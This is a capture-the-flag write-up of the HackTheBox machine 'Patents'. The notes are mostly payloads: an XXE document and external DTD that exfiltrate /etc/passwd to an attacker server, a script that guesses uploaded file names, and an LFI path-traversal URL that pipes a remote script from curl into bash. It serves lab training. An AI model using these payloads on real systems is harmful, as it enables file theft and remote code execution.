Patents @ HackTheBox
Patents is a 40-point Linux machine on HackTheBox. For user we exploit an external entity injection in a word document and a local file inclusion that involves path traversal and calculating the name of an uploaded file. For root we use return oriented programming to exploit a stack overflow in a tcp server.
Notes
customXml\item1.xml:
1
2
3
4
5
6
7
<?xml version="1.0" ?>
<!ENTITY % sp SYSTEM "http://10.10.14.8:8000/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
dtd.xml:
1
2
<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.8:8000/dtd.xml?%data;'>">
Rce.py:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/python3
import hashlib
import datetime
import requests
import time
proxyDict = {
"http" : "127.0.0.1:8081",
}
result = requests.get("http://patents.htb")
dateHdr = result.headers['Date']
t = datetime.datetime.strptime(dateHdr, '%a, %d %b %Y %H:%M:%S GMT')
t -= datetime.timedelta(minutes=5)
it = int(t.timestamp())
while True:
url = f"http://patents.htb/uploads/{hashlib.sha256(b'xct.php' + str(it).encode('utf-8')).hexdigest()}.docx"
r = requests.get(url)#, proxies=proxyDict)
if r.status_code == 200:
print(it)
print(url)
it += 1
LFI:
1
http://patents.htb/getPatent_alphav1.0.php?id=..././uploads/<id>.docx&cmd=curl%2010.10.14.8:8000/xct.sh%20|%20bash
The Root Exploit.
Reads
This post is licensed under CC BY 4.0 by the author.